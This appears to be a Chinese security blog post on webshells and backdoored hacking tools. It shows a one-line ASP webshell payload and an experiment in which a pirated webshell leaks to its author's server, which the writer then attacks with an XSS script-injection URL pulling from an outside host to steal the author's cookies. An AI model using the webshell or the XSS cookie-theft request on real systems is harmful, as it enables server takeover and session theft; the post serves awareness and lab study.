0x00 前言
在测试过程中,往往会用到各种大马,一句话,菜刀等渗透工具,但是有想过这些工具是否存在后门吗?网上有不少破解程序使用,当你试图攻击别人时你已经变成了肉鸡。程序可能已被开发者植入了后门以便可以黑吃黑。感染到的设备都会变成后门开发者的,最终成为开发者组成的僵尸网络
0x01 webshell是什么
webshell:即web网站后门 getshell:是指拿webshell的过程
webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等操作,以达到控制网站服务器的目的
如一句话木马:短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
工作原理:黑客在注册信息的电子邮箱或者个人主页等中插入类似的代码
代码语言:javascript复制<%execute request("U")%>
其中U是值,所以你可以更改自己的值,request就是获取这个值 <%eval>现在比较多见,而且字符少,对表单字数有限制的地方特别的实用。当知道了数据库的URL,就可以利用本地一张网页进行连接得到webshell。不知道数据库也可以,只要知道<%eval>这个文件被插入到哪一个ASP文件里面就可以了,这就被称作一句话木马
0x02 后门是什么
一般存在后门的话,所获得的shell会通过后门发送给箱子,那个箱子就是用来装shell的地方。后门的最主要目的就是方便以后再次秘密进入或者控制系统
0x03 实验
我们通过一个实验感受一下webshell黑吃黑"的过程
通过网站数据包分析到该网站有往外发送数据的情况,这个链接就证明了木马制作者在这个木马里面留了后门39.96.44.170就是这个木马制作者的服务器,而u=127.0.0.1:8080/help.php是我们下的木马的网址,pass=admin,表示这个木马的密码是admin
然后我们再分析一下木马help.php的文件
在webshell箱子里就会出现一条网站的相关信息
我们通过XSS来反搞一下获取到开发者的cookie信息,随便找一个xss的平台
跨站脚本攻击,就是把自己的另外一个站的恶意js代码插入受害者网站,偷cookie功能的实现,实际是这个js用get方式请求了某个url,把偷到的隐私数据发送过去。
尝试在浏览器地址栏输入
http://39.96.44.170/api.asp?url=http://www.dddd.com/help.php&pass=sCRiPt sRC=https://xss8.cc/q5v5发送执行
打开webshell箱子,就会看到已经获取到信息
成功接收数据,因此思路就是:在http://39.96.44.170/api.asp?url=http://www.dddd.com/help.php&pass=后面加上一句话密码就好了
再打开xss平台,就会发现已经获取到webshell的信息包括cookie,有了这些信息我们就能登录webshell箱子了
这波你以为我在第一层,然而这波我却在大气层!碟中谍!
0x04 小结
建议大家还是官网下载文件,要谨慎下载和执行任何来历不明的文件防止有诈。
本文仅供交流讨论,环境是本地搭建测试的,大家莫做违法事!